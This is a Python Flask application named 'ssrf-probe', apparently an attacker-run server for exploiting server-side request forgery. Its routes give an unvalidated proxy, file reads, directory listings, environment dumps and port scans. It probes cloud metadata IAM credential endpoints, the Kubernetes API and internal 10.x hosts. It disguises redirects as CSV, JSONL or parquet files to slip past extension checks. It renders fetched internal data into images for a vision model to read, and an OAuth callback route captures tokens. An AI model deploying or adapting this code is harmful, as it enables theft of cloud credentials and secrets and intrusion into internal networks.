# ssrf-probe / app.py
# FIRSTACCOUNT69's picture
# Add CIMD and callback endpoints
# b1754d2 verified
from flask import Flask, request, jsonify, redirect, Response, make_response
import requests, os, socket, json, time
# Flask application object that every route in this file is registered on.
app = Flask(__name__)
# In-memory list of request-log entries; handlers append one dict per request.
LOG = []
@app.route('/')
def index():
    """Answer the root path with the fixed plain-text body ``OK``."""
    body = 'OK'
    return body
@app.route('/log', methods=['GET', 'POST', 'PUT', 'DELETE', 'PATCH'])
def log_request():
    """Append a description of the incoming request to ``LOG``.

    The stored dict holds the current timestamp, HTTP method, full path
    (including query string), request headers, the first 2000 characters of
    the body decoded as text, and the peer address.

    Returns:
        The literal string ``'logged'``.
    """
    record = dict(
        time=time.time(),
        method=request.method,
        path=request.full_path,
        headers=dict(request.headers),
        body=request.get_data(as_text=True)[:2000],
        remote_addr=request.remote_addr,
    )
    LOG.append(record)
    return 'logged'
@app.route('/logs')
def show_logs():
    """Return the last 200 entries of ``LOG`` as a JSON array.

    NOTE(review): no access check is performed, so logged request headers
    are visible to any caller.
    """
    newest = LOG[-200:]
    return jsonify(newest)
@app.route('/clear-logs')
def clear_logs():
    """Empty the shared ``LOG`` list in place and reply with ``cleared``."""
    del LOG[:]
    return 'cleared'
@app.route('/fetch')
def fetch():
    """Issue a server-side GET to the ``url`` query parameter and relay it.

    Query parameters:
        url: Address to request (defaults to the empty string).
        headers: Comma-separated ``Name:Value`` pairs; items without a colon
            are ignored and every ``+`` in a value becomes a space.

    Returns:
        The upstream body and status code as ``text/plain``, or the
        exception text with status 500 when the request fails.

    NOTE(review): the URL is not validated and TLS certificate verification
    is disabled (``verify=False``).
    """
    url = request.args.get('url', '')
    outgoing = {}
    for item in request.args.get('headers', '').split(','):
        name, colon, value = item.partition(':')
        if not colon:
            continue
        outgoing[name] = value.replace('+', ' ')
    try:
        upstream = requests.get(url, headers=outgoing, timeout=5, verify=False)
        return upstream.text, upstream.status_code, {'Content-Type': 'text/plain'}
    except Exception as exc:
        return str(exc), 500
@app.route('/redir')
def redir():
    """Log the request, then redirect to the ``url`` query parameter.

    Query parameters:
        url: Redirect destination (defaults to ``/``).
        code: HTTP status for the redirect, parsed with ``int`` (defaults to
            ``302``); a non-numeric value raises before anything is logged.
    """
    params = request.args
    target = params.get('url', '/')
    code = int(params.get('code', '302'))
    LOG.append(dict(
        time=time.time(),
        method=request.method,
        path=request.full_path,
        headers=dict(request.headers),
        remote_addr=request.remote_addr,
    ))
    return redirect(target, code=code)
# Redirect endpoint that looks like a CSV file
@app.route('/redir-data.csv')
def redir_csv():
    """Log the request, then redirect to the ``t`` query parameter.

    Query parameters:
        t: Redirect destination (defaults to ``/``).
        code: HTTP status for the redirect, parsed with ``int`` (defaults to
            ``302``).
    """
    params = request.args
    target = params.get('t', '/')
    code = int(params.get('code', '302'))
    record = {}
    record['time'] = time.time()
    record['method'] = request.method
    record['path'] = request.full_path
    record['headers'] = dict(request.headers)
    record['remote_addr'] = request.remote_addr
    LOG.append(record)
    return redirect(target, code=code)
# Redirect that looks like a JSONL file
@app.route('/redir-data.jsonl')
def redir_jsonl():
    """Log the request, then redirect to the ``t`` query parameter.

    Query parameters:
        t: Redirect destination (defaults to ``/``).
        code: HTTP status for the redirect, parsed with ``int`` (defaults to
            ``302``).
    """
    target = request.args.get('t', '/')
    status = int(request.args.get('code', '302'))
    LOG.append(dict(
        time=time.time(),
        method=request.method,
        path=request.full_path,
        headers=dict(request.headers),
        remote_addr=request.remote_addr,
    ))
    return redirect(target, code=status)
# Redirect that looks like a parquet file
@app.route('/redir-data.parquet')
def redir_parquet():
    """Log the request, then redirect to the ``t`` query parameter.

    Query parameters:
        t: Redirect destination (defaults to ``/``).
        code: HTTP status for the redirect, parsed with ``int`` (defaults to
            ``302``).
    """
    destination = request.args.get('t', '/')
    status = int(request.args.get('code', '302'))
    seen = dict(
        time=time.time(),
        method=request.method,
        path=request.full_path,
        headers=dict(request.headers),
        remote_addr=request.remote_addr,
    )
    LOG.append(seen)
    return redirect(destination, code=status)
# Smart proxy CSV: fetches any URL and returns result as CSV
@app.route('/proxy-csv.csv')
def proxy_csv():
    """Log the request, GET the ``t`` query parameter, and wrap it as CSV.

    The first 100 newline-separated pieces of the upstream body are taken,
    whitespace-only ones are dropped, and each survivor is wrapped in double
    quotes under a single ``text`` header. Every outcome, including errors,
    is returned with status 200 and ``text/csv``.

    NOTE(review): the URL is not validated, TLS verification is disabled,
    and embedded double quotes are not escaped.
    """
    csv_type = {'Content-Type': 'text/csv'}
    target = request.args.get('t', '')
    LOG.append(dict(
        time=time.time(),
        method=request.method,
        path=request.full_path,
        headers=dict(request.headers),
        remote_addr=request.remote_addr,
    ))
    if not target:
        return 'text\nno target specified\n', 200, csv_type
    try:
        upstream = requests.get(target, timeout=10, verify=False)
        quoted = [f'"{row}"' for row in upstream.text.split('\n')[:100] if row.strip()]
        payload = 'text\n' + '\n'.join(quoted) + '\n'
        return payload, 200, csv_type
    except Exception as exc:
        return f'text\nerror: {str(exc)}\n', 200, csv_type
# Smart proxy JSONL
@app.route('/proxy-jsonl.jsonl')
def proxy_jsonl():
    """Log the request, GET the ``t`` query parameter, and wrap it as JSONL.

    The first 100 newline-separated pieces of the upstream body are taken,
    whitespace-only ones are dropped, and each survivor becomes a
    ``{"text": ...}`` JSON object on its own line. Every outcome, including
    errors, is returned with status 200 and ``application/jsonl``.

    NOTE(review): the URL is not validated and TLS verification is disabled.
    """
    jsonl_type = {'Content-Type': 'application/jsonl'}
    target = request.args.get('t', '')
    LOG.append(dict(
        time=time.time(),
        method=request.method,
        path=request.full_path,
        headers=dict(request.headers),
        remote_addr=request.remote_addr,
    ))
    if not target:
        return '{"text": "no target"}\n', 200, jsonl_type
    try:
        upstream = requests.get(target, timeout=10, verify=False)
        records = [
            json.dumps({"text": row})
            for row in upstream.text.split('\n')[:100]
            if row.strip()
        ]
        return '\n'.join(records) + '\n', 200, jsonl_type
    except Exception as exc:
        return json.dumps({"text": f"error: {str(exc)}"}) + '\n', 200, jsonl_type
# Path-based proxy CSV: target URL is in the path, filename is data.csv
# URL format: /p/<base64_encoded_target>/data.csv
# This way the basename is always data.csv (passes extension check)
import base64
@app.route('/p/<target_b64>/data.csv')
def path_proxy_csv(target_b64):
    """Log the request, decode the URL in the path, fetch it, return CSV.

    Args:
        target_b64: URL-safe base64 text of the target URL; ``==`` is
            appended before decoding so missing padding is tolerated.

    Returns:
        For HEAD requests, an empty ``text/csv`` response whose
        ``Content-Length`` header is hard-coded to ``100``. Otherwise the
        first 100 non-blank lines of the upstream body, each wrapped in
        double quotes under a ``text`` header. Decode and fetch failures are
        reported as CSV text; every response uses status 200.

    NOTE(review): the decoded URL is not validated and TLS verification is
    disabled.
    """
    csv_type = {'Content-Type': 'text/csv'}
    LOG.append(dict(
        time=time.time(),
        method=request.method,
        path=request.full_path,
        headers=dict(request.headers),
        remote_addr=request.remote_addr,
    ))
    try:
        target = base64.urlsafe_b64decode(target_b64 + '==').decode()
    except Exception:
        return 'text\nerror: invalid target encoding\n', 200, csv_type
    if request.method == 'HEAD':
        head_reply = make_response('', 200)
        head_reply.headers['Content-Type'] = 'text/csv'
        head_reply.headers['Content-Length'] = '100'
        return head_reply
    try:
        upstream = requests.get(target, timeout=10, verify=False)
        quoted = [f'"{row}"' for row in upstream.text.split('\n')[:100] if row.strip()]
        return 'text\n' + '\n'.join(quoted) + '\n', 200, csv_type
    except Exception as exc:
        return f'text\nerror: {str(exc)}\n', 200, csv_type
# Path-based proxy JSONL
@app.route('/p/<target_b64>/data.jsonl')
def path_proxy_jsonl(target_b64):
    """Log the request, decode the URL in the path, fetch it, return JSONL.

    Args:
        target_b64: URL-safe base64 text of the target URL; ``==`` is
            appended before decoding so missing padding is tolerated.

    Returns:
        For HEAD requests, an empty ``application/jsonl`` response whose
        ``Content-Length`` header is hard-coded to ``100``. Otherwise one
        ``{"text": ...}`` object per non-blank line among the first 100 lines
        of the upstream body. Decode and fetch failures are reported as a
        JSON line; every response uses status 200.

    NOTE(review): the decoded URL is not validated and TLS verification is
    disabled.
    """
    jsonl_type = {'Content-Type': 'application/jsonl'}
    LOG.append(dict(
        time=time.time(),
        method=request.method,
        path=request.full_path,
        headers=dict(request.headers),
        remote_addr=request.remote_addr,
    ))
    try:
        target = base64.urlsafe_b64decode(target_b64 + '==').decode()
    except Exception:
        return '{"text": "error: invalid target encoding"}\n', 200, jsonl_type
    if request.method == 'HEAD':
        head_reply = make_response('', 200)
        head_reply.headers['Content-Type'] = 'application/jsonl'
        head_reply.headers['Content-Length'] = '100'
        return head_reply
    try:
        upstream = requests.get(target, timeout=10, verify=False)
        records = [
            json.dumps({"text": row})
            for row in upstream.text.split('\n')[:100]
            if row.strip()
        ]
        return '\n'.join(records) + '\n', 200, jsonl_type
    except Exception as exc:
        return json.dumps({"text": f"error: {str(exc)}"}) + '\n', 200, jsonl_type
@app.route('/data.csv')
def serve_csv():
    """Log the request (including up to 2000 body characters) and return a
    fixed three-line CSV document as ``text/csv``."""
    record = dict(
        time=time.time(),
        method=request.method,
        path=request.full_path,
        headers=dict(request.headers),
        body=request.get_data(as_text=True)[:2000],
        remote_addr=request.remote_addr,
    )
    LOG.append(record)
    fixed_csv = 'text\nhello world\nssrf confirmed\n'
    return fixed_csv, 200, {'Content-Type': 'text/csv'}
@app.route('/data.jsonl')
def serve_jsonl():
    """Log the request (including up to 2000 body characters) and return a
    fixed two-record JSONL document as ``application/jsonl``."""
    record = dict(
        time=time.time(),
        method=request.method,
        path=request.full_path,
        headers=dict(request.headers),
        body=request.get_data(as_text=True)[:2000],
        remote_addr=request.remote_addr,
    )
    LOG.append(record)
    fixed_jsonl = '{"text": "hello world"}\n{"text": "ssrf confirmed"}\n'
    return fixed_jsonl, 200, {'Content-Type': 'application/jsonl'}
@app.route('/env')
def env():
    """Return every environment variable of this process as a JSON object.

    NOTE(review): no access check is performed, so any secrets held in the
    environment are disclosed to every caller.
    """
    snapshot = {name: value for name, value in os.environ.items()}
    return jsonify(snapshot)
@app.route('/scan')
def scan():
    """Attempt a TCP connect to each requested port and report the outcome.

    Query parameters:
        host: Host name or address to connect to (defaults to ``''``).
        ports: Comma-separated port list (defaults to ``80,443``).
        timeout: Per-connection timeout in seconds, parsed with ``float``
            (defaults to ``1``).

    Returns:
        A JSON object mapping each port string, as supplied, to ``'open'``,
        ``'closed'`` or the text of the exception raised for that port.

    NOTE(review): ``host`` and ``ports`` are used as supplied and no access
    check is performed.
    """
    host = request.args.get('host', '')
    ports = request.args.get('ports', '80,443').split(',')
    timeout = float(request.args.get('timeout', '1'))
    results = {}
    for p in ports:
        try:
            # The context manager closes the socket even when int(p) or
            # connect_ex raises; previously close() was skipped on that path
            # and the descriptor leaked.
            with socket.socket(socket.AF_INET, socket.SOCK_STREAM) as s:
                s.settimeout(timeout)
                status = s.connect_ex((host, int(p)))
            results[p] = 'open' if status == 0 else 'closed'
        except Exception as e:
            results[p] = str(e)
    return jsonify(results)
@app.route('/resolve')
def resolve():
    """Resolve the ``host`` query parameter with ``socket.gethostbyname``.

    Returns:
        JSON ``{'ip': ..., 'host': ...}`` on success, or ``{'error': ...}``
        carrying the exception text when the lookup fails.
    """
    host = request.args.get('host', '')
    try:
        address = socket.gethostbyname(host)
        return jsonify({'ip': address, 'host': host})
    except Exception as exc:
        return jsonify({'error': str(exc)})
@app.route('/readfile')
def readfile():
    """Return up to the first 10000 characters of the file named by ``path``.

    Query parameters:
        path: Filesystem path to open in text mode (defaults to ``''``).

    Returns:
        The text as ``text/plain`` with status 200, or the exception text
        with status 500 when the file cannot be opened or read.

    NOTE(review): ``path`` is not validated and no access check is
    performed, so any file readable by this process can be requested.
    """
    path = request.args.get('path', '')
    try:
        with open(path, 'r') as f:
            # Bounded read: ask for at most 10000 characters instead of
            # loading the entire file into memory and slicing afterwards.
            return f.read(10000), 200, {'Content-Type': 'text/plain'}
    except Exception as e:
        return str(e), 500
@app.route('/listdir')
def listdir():
    """List the directory named by the ``path`` query parameter.

    Returns:
        A JSON array of entry names from ``os.listdir`` (``path`` defaults
        to ``/``), or ``{'error': ...}`` with the exception text on failure.

    NOTE(review): ``path`` is not validated and no access check is performed.
    """
    directory = request.args.get('path', '/')
    try:
        return jsonify(os.listdir(directory))
    except Exception as exc:
        return jsonify({'error': str(exc)})
@app.route('/post')
def do_post():
    """Issue a server-side POST to the ``url`` query parameter and relay it.

    Query parameters:
        url: Address to post to (defaults to the empty string).
        body: Request body sent as-is (defaults to the empty string).
        ct: ``Content-Type`` of the outgoing request (defaults to
            ``application/json``).
        headers: Comma-separated ``Name:Value`` pairs merged over the
            Content-Type header; items without a colon are ignored and every
            ``+`` in a value becomes a space.

    Returns:
        The upstream body and status code as ``text/plain``, or the
        exception text with status 500 when the request fails.

    NOTE(review): the URL is not validated and TLS verification is disabled.
    """
    params = request.args
    url = params.get('url', '')
    body = params.get('body', '')
    outgoing = {'Content-Type': params.get('ct', 'application/json')}
    for item in params.get('headers', '').split(','):
        name, colon, value = item.partition(':')
        if not colon:
            continue
        outgoing[name] = value.replace('+', ' ')
    try:
        upstream = requests.post(url, data=body, headers=outgoing, timeout=10, verify=False)
        return upstream.text, upstream.status_code, {'Content-Type': 'text/plain'}
    except Exception as exc:
        return str(exc), 500
@app.route('/selfenv.csv')
def selfenv_csv():
    """Log the request, GET ``http://localhost:7860/env``, and return the
    JSON object it yields as a ``key,value`` CSV.

    Each value is converted with ``str`` and cut to 200 characters. Failures
    are reported as a single ``error`` row; every response uses status 200.
    """
    csv_type = {'Content-Type': 'text/csv'}
    LOG.append(dict(
        time=time.time(),
        method=request.method,
        path=request.full_path,
        headers=dict(request.headers),
        remote_addr=request.remote_addr,
    ))
    try:
        reply = requests.get('http://localhost:7860/env', timeout=5)
        variables = reply.json()
        rows = ['key,value']
        rows.extend(f'"{k}","{str(v)[:200]}"' for k, v in variables.items())
        return '\n'.join(rows) + '\n', 200, csv_type
    except Exception as exc:
        return f'key,value\nerror,"{str(exc)}"\n', 200, csv_type
@app.route('/k8sapi.csv')
def k8s_csv():
    """Log the request, GET three hard-coded ``/api`` URLs, and report each
    result as a ``target,status,response`` CSV row.

    Response text is cut to 200 characters and exception text to 100; TLS
    verification is disabled for every request.
    """
    LOG.append(dict(
        time=time.time(),
        method=request.method,
        path=request.full_path,
        headers=dict(request.headers),
        remote_addr=request.remote_addr,
    ))
    endpoints = [
        'https://172.20.0.1:443/api',
        'https://kubernetes.default.svc:443/api',
        'http://172.20.0.1:80/api',
    ]

    def probe(endpoint):
        # One CSV row per endpoint; failures become an "error" row.
        try:
            reply = requests.get(endpoint, timeout=3, verify=False)
            return f'"{endpoint}","{reply.status_code}","{reply.text[:200]}"'
        except Exception as exc:
            return f'"{endpoint}","error","{str(exc)[:100]}"'

    rows = [probe(endpoint) for endpoint in endpoints]
    return 'target,status,response\n' + '\n'.join(rows) + '\n', 200, {'Content-Type': 'text/csv'}
@app.route('/metadata.csv')
def metadata_csv():
    """Log the request, GET four hard-coded metadata-style URLs (each with
    its own extra headers), and report each result as a
    ``target,status,response`` CSV row.

    Response text is cut to 200 characters and exception text to 100; TLS
    verification is disabled for every request.
    """
    LOG.append(dict(
        time=time.time(),
        method=request.method,
        path=request.full_path,
        headers=dict(request.headers),
        remote_addr=request.remote_addr,
    ))
    endpoints = [
        ('http://169.254.169.254/latest/meta-data/', {}),
        ('http://169.254.169.254/latest/meta-data/iam/security-credentials/', {}),
        ('http://metadata.google.internal/computeMetadata/v1/', {'Metadata-Flavor': 'Google'}),
        ('http://100.100.100.200/latest/meta-data/', {}),
    ]
    rows = []
    for address, extra_headers in endpoints:
        try:
            reply = requests.get(address, headers=extra_headers, timeout=3, verify=False)
            row = f'"{address}","{reply.status_code}","{reply.text[:200]}"'
        except Exception as exc:
            row = f'"{address}","error","{str(exc)[:100]}"'
        rows.append(row)
    return 'target,status,response\n' + '\n'.join(rows) + '\n', 200, {'Content-Type': 'text/csv'}
@app.route('/internalprobe.csv')
def internalprobe_csv():
    """Log the request, GET four hard-coded ``10.x`` HTTP URLs, and report
    each result as a ``target,status,response`` CSV row.

    Response text is cut to 200 characters and exception text to 100.
    """
    LOG.append(dict(
        time=time.time(),
        method=request.method,
        path=request.full_path,
        headers=dict(request.headers),
        remote_addr=request.remote_addr,
    ))
    endpoints = (
        'http://10.16.4.123:80/',
        'http://10.16.34.155:80/',
        'http://10.20.1.9:80/',
        'http://10.20.31.87:80/',
    )
    rows = []
    for endpoint in endpoints:
        try:
            reply = requests.get(endpoint, timeout=3, verify=False)
            row = f'"{endpoint}","{reply.status_code}","{reply.text[:200]}"'
        except Exception as exc:
            row = f'"{endpoint}","error","{str(exc)[:100]}"'
        rows.append(row)
    body = 'target,status,response\n' + '\n'.join(rows) + '\n'
    return body, 200, {'Content-Type': 'text/csv'}
@app.route('/selfenv.jsonl')
def selfenv_jsonl():
    """Log the request, GET ``http://localhost:7860/env``, and return the
    JSON object it yields as JSONL.

    Each pair becomes ``{"text": "KEY=VALUE"}`` with the value converted via
    ``str`` and cut to 200 characters. Failures are reported as a single
    error record; every response uses status 200.
    """
    jsonl_type = {'Content-Type': 'application/jsonl'}
    LOG.append(dict(
        time=time.time(),
        method=request.method,
        path=request.full_path,
        headers=dict(request.headers),
        remote_addr=request.remote_addr,
    ))
    try:
        reply = requests.get('http://localhost:7860/env', timeout=5)
        variables = reply.json()
        records = []
        for k, v in variables.items():
            records.append(json.dumps({"text": f"{k}={str(v)[:200]}"}))
        return '\n'.join(records) + '\n', 200, jsonl_type
    except Exception as exc:
        return json.dumps({"text": f"error: {str(exc)}"}) + '\n', 200, jsonl_type
# Image proxy - fetches URL, renders response text into a PNG image
# The vision model will read the text from the image
from PIL import Image, ImageDraw, ImageFont
import io
@app.route('/img-proxy.png')
def img_proxy():
    """Log the request, GET the ``url`` query parameter, and draw the result
    as black text on a white 800-pixel-wide PNG.

    The drawn text holds the URL, status code, response headers and the
    first 3000 characters of the body, or the exception text on failure. A
    ``Metadata-Flavor: Google`` header is sent when the URL contains
    ``metadata.google``. Each drawn line is cut to 100 characters.

    NOTE(review): the URL is not validated and TLS verification is disabled.
    """
    target = request.args.get('url', '')
    LOG.append(dict(
        time=time.time(),
        method=request.method,
        path=request.full_path,
        headers=dict(request.headers),
        remote_addr=request.remote_addr,
    ))
    if target:
        try:
            extra_headers = {}
            if 'metadata.google' in target:
                extra_headers['Metadata-Flavor'] = 'Google'
            reply = requests.get(target, headers=extra_headers, timeout=5, verify=False)
            text = f"URL: {target}\nStatus: {reply.status_code}\nHeaders: {dict(reply.headers)}\n\nBody:\n{reply.text[:3000]}"
        except Exception as exc:
            text = f"URL: {target}\nError: {str(exc)}"
    else:
        text = "No URL specified"

    # Rasterise: one 16-pixel row per text line, at least 200 pixels tall.
    rows = text.split('\n')
    row_height = 16
    canvas = Image.new('RGB', (800, max(200, (len(rows) + 2) * row_height)), color='white')
    pen = ImageDraw.Draw(canvas)
    for index, row in enumerate(rows):
        pen.text((10, 10 + index * row_height), row[:100], fill='black')
    out = io.BytesIO()
    canvas.save(out, format='PNG')
    out.seek(0)
    return out.getvalue(), 200, {'Content-Type': 'image/png'}
@app.route('/img-env.png')
def img_env():
    """Log the request and draw this process's environment variables,
    sorted by name, as black text on a white 800-pixel-wide PNG.

    Each value is cut to 100 characters, as is each drawn line.

    NOTE(review): no access check is performed.
    """
    LOG.append(dict(
        time=time.time(),
        method=request.method,
        path=request.full_path,
        headers=dict(request.headers),
        remote_addr=request.remote_addr,
    ))
    text = "Space Environment:\n" + ''.join(
        f"{k}={str(v)[:100]}\n" for k, v in sorted(os.environ.items())
    )
    rows = text.split('\n')
    row_height = 16
    canvas = Image.new('RGB', (800, max(200, (len(rows) + 2) * row_height)), color='white')
    pen = ImageDraw.Draw(canvas)
    for index, row in enumerate(rows):
        pen.text((10, 10 + index * row_height), row[:100], fill='black')
    out = io.BytesIO()
    canvas.save(out, format='PNG')
    out.seek(0)
    return out.getvalue(), 200, {'Content-Type': 'image/png'}
@app.route('/img-internal.png')
def img_internal():
    """Log the request, GET four hard-coded URLs, and draw one result line
    per URL as black text on a white 800-pixel-wide PNG.

    Response text is cut to 200 characters and exception text to 100; each
    drawn line is cut to 100 characters.
    """
    LOG.append(dict(
        time=time.time(),
        method=request.method,
        path=request.full_path,
        headers=dict(request.headers),
        remote_addr=request.remote_addr,
    ))
    endpoints = [
        'http://169.254.169.254/latest/meta-data/',
        'http://169.254.169.254/latest/meta-data/iam/security-credentials/',
        'http://10.0.249.125/',
        'http://10.0.249.125/api/whoami-v2',
    ]
    pieces = ["Internal Network Probe:\n\n"]
    for endpoint in endpoints:
        try:
            reply = requests.get(endpoint, timeout=3, verify=False)
            pieces.append(f"[{endpoint}] {reply.status_code}: {reply.text[:200]}\n")
        except Exception as exc:
            pieces.append(f"[{endpoint}] Error: {str(exc)[:100]}\n")
    rows = ''.join(pieces).split('\n')
    row_height = 16
    canvas = Image.new('RGB', (800, max(200, (len(rows) + 2) * row_height)), color='white')
    pen = ImageDraw.Draw(canvas)
    for index, row in enumerate(rows):
        pen.text((10, 10 + index * row_height), row[:100], fill='black')
    out = io.BytesIO()
    canvas.save(out, format='PNG')
    out.seek(0)
    return out.getvalue(), 200, {'Content-Type': 'image/png'}
# Serve a valid small test image
@app.route('/test.png')
def test_png():
    """Log the request and return a 200x100 red PNG carrying a fixed caption
    and the current timestamp in white text."""
    LOG.append(dict(
        time=time.time(),
        method=request.method,
        path=request.full_path,
        headers=dict(request.headers),
        remote_addr=request.remote_addr,
    ))
    canvas = Image.new('RGB', (200, 100), color='red')
    pen = ImageDraw.Draw(canvas)
    captions = (
        ((10, 10), "SSRF TEST IMAGE"),
        ((10, 30), f"Time: {time.time()}"),
    )
    for position, caption in captions:
        pen.text(position, caption, fill='white')
    out = io.BytesIO()
    canvas.save(out, format='PNG')
    out.seek(0)
    return out.getvalue(), 200, {'Content-Type': 'image/png'}
@app.route("/.well-known/oauth-client")
def cimd():
    """Log the request with the note ``CIMD_FETCH`` and return a fixed OAuth
    client metadata document as JSON."""
    LOG.append(dict(
        time=time.time(),
        method=request.method,
        path=request.full_path,
        headers=dict(request.headers),
        remote_addr=request.remote_addr,
        note="CIMD_FETCH",
    ))
    document = dict(
        client_id="https://firstaccount69-ssrf-probe.hf.space/.well-known/oauth-client",
        client_name="SSRF Probe CIMD Test",
        redirect_uris=["https://firstaccount69-ssrf-probe.hf.space/callback"],
        scope="openid profile email read-repos write-repos manage-repos",
        grant_types=["authorization_code", "refresh_token", "urn:ietf:params:oauth:grant-type:token-exchange"],
        response_types=["code"],
        token_endpoint_auth_method="none",
    )
    return jsonify(document)
@app.route("/callback")
def oauth_callback():
    """Log the request, including its query arguments, with the note
    ``OAUTH_CALLBACK`` and echo those arguments back as JSON.

    NOTE(review): query arguments are stored in ``LOG`` and returned
    verbatim; anything sensitive delivered to this URL is retained.
    """
    LOG.append(dict(
        time=time.time(),
        method=request.method,
        path=request.full_path,
        headers=dict(request.headers),
        args=dict(request.args),
        remote_addr=request.remote_addr,
        note="OAUTH_CALLBACK",
    ))
    echoed = dict(request.args)
    return jsonify({"status": "captured", "args": echoed})
if __name__ == '__main__':
    # Script entry point: serve on every interface, port 7860.
    bind_host, bind_port = '0.0.0.0', 7860
    app.run(host=bind_host, port=bind_port)